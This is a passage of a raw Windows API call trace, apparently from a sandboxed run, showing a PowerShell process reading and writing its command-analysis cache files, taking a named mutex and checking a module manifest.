(lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0170.989] GetFileType (hFile=0x45c) returned 0x1 [0170.989] GetFileType (hFile=0x45c) returned 0x1 [0170.989] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a9b8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a9b8*=0x1000, lpOverlapped=0x0) returned 1 [0170.989] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396abdd3, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8a658, lpOverlapped=0x0 | out: lpBuffer=0x1e3396abdd3*, lpNumberOfBytesRead=0xb156f8a658*=0x28, lpOverlapped=0x0) returned 1 [0170.989] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a628, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a628*=0x1000, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396abdff, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8a658, lpOverlapped=0x0 | out: lpBuffer=0x1e3396abdff*, lpNumberOfBytesRead=0xb156f8a658*=0x14, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a628, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a628*=0x1000, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396abdc2, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8a658, lpOverlapped=0x0 | out: lpBuffer=0x1e3396abdc2*, lpNumberOfBytesRead=0xb156f8a658*=0x2f, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a628, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a628*=0x1000, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396abd88, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8a5e8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396abd88*, lpNumberOfBytesRead=0xb156f8a5e8*=0x17, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a688, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a688*=0xd58, lpOverlapped=0x0) returned 1 [0170.990] ReadFile (in: hFile=0x45c, lpBuffer=0x1e3396aa000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a988, lpOverlapped=0x0 | out: lpBuffer=0x1e3396aa000*, lpNumberOfBytesRead=0xb156f8a988*=0x0, lpOverlapped=0x0) returned 1 [0170.990] CloseHandle (hObject=0x45c) returned 1 [0170.991] CoTaskMemAlloc (cb=0x20c) returned 0x1e3514516d0 [0170.991] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e3514516d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0170.991] CoTaskMemFree (pv=0x1e3514516d0) [0170.991] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8a6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0170.991] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8a840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0170.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad70 | out: lpFileInformation=0xb156f8ad70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0170.991] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e", nBufferLength=0x105, lpBuffer=0xb156f8a6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e", lpFilePart=0x0) returned 0x93 [0170.991] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0170.992] GetFileType (hFile=0x45c) returned 0x1 [0170.992] GetFileType (hFile=0x45c) returned 0x1 [0170.992] SetEndOfFile (hFile=0x45c) returned 1 [0170.993] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396b8580*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0xb156f8acd8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396b8580*, lpNumberOfBytesWritten=0xb156f8acd8*=0x25a, lpOverlapped=0x0) returned 1 [0170.995] CloseHandle (hObject=0x45c) returned 1 [0170.997] CoTaskMemAlloc (cb=0x20c) returned 0x1e351451290 [0170.997] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e351451290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0170.997] CoTaskMemFree (pv=0x1e351451290) [0170.997] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8a650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0170.997] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8a7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0170.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad10 | out: lpFileInformation=0xb156f8ad10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0170.998] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8a690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0170.998] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0170.998] GetFileType (hFile=0x45c) returned 0x1 [0170.998] GetFileType (hFile=0x45c) returned 0x1 [0170.998] SetEndOfFile (hFile=0x45c) returned 1 [0170.999] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396baae8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8a3b8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396baae8*, lpNumberOfBytesWritten=0xb156f8a3b8*=0x1000, lpOverlapped=0x0) returned 1 [0171.000] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396baae8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e3396baae8*, lpNumberOfBytesWritten=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0171.000] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396baae8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e3396baae8*, lpNumberOfBytesWritten=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0171.001] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396baae8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8a3b8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396baae8*, lpNumberOfBytesWritten=0xb156f8a3b8*=0x1000, lpOverlapped=0x0) returned 1 [0171.001] WriteFile (in: hFile=0x45c, lpBuffer=0x1e3396baae8*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0xb156f8ac78, lpOverlapped=0x0 | out: lpBuffer=0x1e3396baae8*, lpNumberOfBytesWritten=0xb156f8ac78*=0xdda, lpOverlapped=0x0) returned 1 [0171.001] CloseHandle (hObject=0x45c) returned 1 [0171.005] ReleaseMutex (hMutex=0x730) returned 1 [0171.028] CoTaskMemAlloc (cb=0x20c) returned 0x1e3514529f0 [0171.028] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e3514529f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.028] CoTaskMemFree (pv=0x1e3514529f0) [0171.028] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.028] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144d4f0 [0171.028] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144d4f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.028] CoTaskMemFree (pv=0x1e35144d4f0) [0171.029] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144b950 [0171.029] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144b950 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.029] CoTaskMemFree (pv=0x1e35144b950) [0171.029] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.029] GetCurrentProcess () returned 0xffffffffffffffff [0171.029] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c748 | out: TokenHandle=0xb156f8c748*=0x45c) returned 1 [0171.029] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8c848 | out: TokenInformation=0x0, ReturnLength=0xb156f8c848) returned 0 [0171.029] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d65d0 [0171.029] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x1e3513d65d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8c848 | out: TokenInformation=0x1e3513d65d0, ReturnLength=0xb156f8c848) returned 1 [0171.030] LocalFree (hMem=0x1e3513d65d0) returned 0x0 [0171.031] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e3396c0198, cbSid=0xb156f8c840 | out: pSid=0x1e3396c0198*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8c840) returned 1 [0171.031] CreateMutexW (lpMutexAttributes=0x1e3396c02e8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x870 [0171.031] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8c6e0*=0x870, lpdwindex=0xb156f8c4b4 | out: lpdwindex=0xb156f8c4b4) returned 0x0 [0171.031] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c660) returned 1 [0171.031] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c740 | out: lpFileInformation=0xb156f8c740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c620) returned 1 [0171.032] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5a0) returned 1 [0171.032] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x798 [0171.032] GetFileType (hFile=0x798) returned 0x1 [0171.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.032] GetFileType (hFile=0x798) returned 0x1 [0171.032] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c408, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c408*=0x1000, lpOverlapped=0x0) returned 1 [0171.032] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c3183, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8c0a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c3183*, lpNumberOfBytesRead=0xb156f8c0a8*=0x28, lpOverlapped=0x0) returned 1 [0171.032] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c078, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c078*=0x1000, lpOverlapped=0x0) returned 1 [0171.032] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c31af, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8c0a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c31af*, lpNumberOfBytesRead=0xb156f8c0a8*=0x14, lpOverlapped=0x0) returned 1 [0171.032] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c078, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c078*=0x1000, lpOverlapped=0x0) returned 1 [0171.033] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c3172, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8c0a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c3172*, lpNumberOfBytesRead=0xb156f8c0a8*=0x2f, lpOverlapped=0x0) returned 1 [0171.033] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c078, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c078*=0x1000, lpOverlapped=0x0) returned 1 [0171.033] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c3138, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8c038, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c3138*, lpNumberOfBytesRead=0xb156f8c038*=0x17, lpOverlapped=0x0) returned 1 [0171.033] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c0d8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c0d8*=0xd58, lpOverlapped=0x0) returned 1 [0171.033] ReadFile (in: hFile=0x798, lpBuffer=0x1e3396c13b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c3d8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396c13b0*, lpNumberOfBytesRead=0xb156f8c3d8*=0x0, lpOverlapped=0x0) returned 1 [0171.033] CloseHandle (hObject=0x798) returned 1 [0171.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0171.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.055] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e3396ce410 | out: lpFileInformation=0x1e3396ce410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0171.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.055] ReleaseMutex (hMutex=0x870) returned 1 [0171.055] GetCurrentProcess () returned 0xffffffffffffffff [0171.056] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c878 | out: TokenHandle=0xb156f8c878*=0x798) returned 1 [0171.056] GetTokenInformation (in: TokenHandle=0x798, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8c978 | out: TokenInformation=0x0, ReturnLength=0xb156f8c978) returned 0 [0171.056] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d65d0 [0171.056] GetTokenInformation (in: TokenHandle=0x798, TokenInformationClass=0x1, TokenInformation=0x1e3513d65d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8c978 | out: TokenInformation=0x1e3513d65d0, ReturnLength=0xb156f8c978) returned 1 [0171.057] LocalFree (hMem=0x1e3513d65d0) returned 0x0 [0171.057] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e3396cf0a8, cbSid=0xb156f8c970 | out: pSid=0x1e3396cf0a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8c970) returned 1 [0171.057] CreateMutexW (lpMutexAttributes=0x1e3396cf1f8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x738 [0171.058] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8c810*=0x738, lpdwindex=0xb156f8c5e4 | out: lpdwindex=0xb156f8c5e4) returned 0x0 [0171.058] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144e1b0 [0171.058] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144e1b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.058] CoTaskMemFree (pv=0x1e35144e1b0) [0171.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0171.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c8a0) returned 1 [0171.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e3396d09f0 | out: lpFileInformation=0x1e3396d09f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0171.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c860) returned 1 [0171.059] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c720) returned 1 [0171.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c800 | out: lpFileInformation=0xb156f8c800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.059] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8c180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c660) returned 1 [0171.060] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x35c [0171.060] GetFileType (hFile=0x35c) returned 0x1 [0171.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5d0) returned 1 [0171.060] GetFileType (hFile=0x35c) returned 0x1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c4c8, lpOverlapped=0x0 | out: 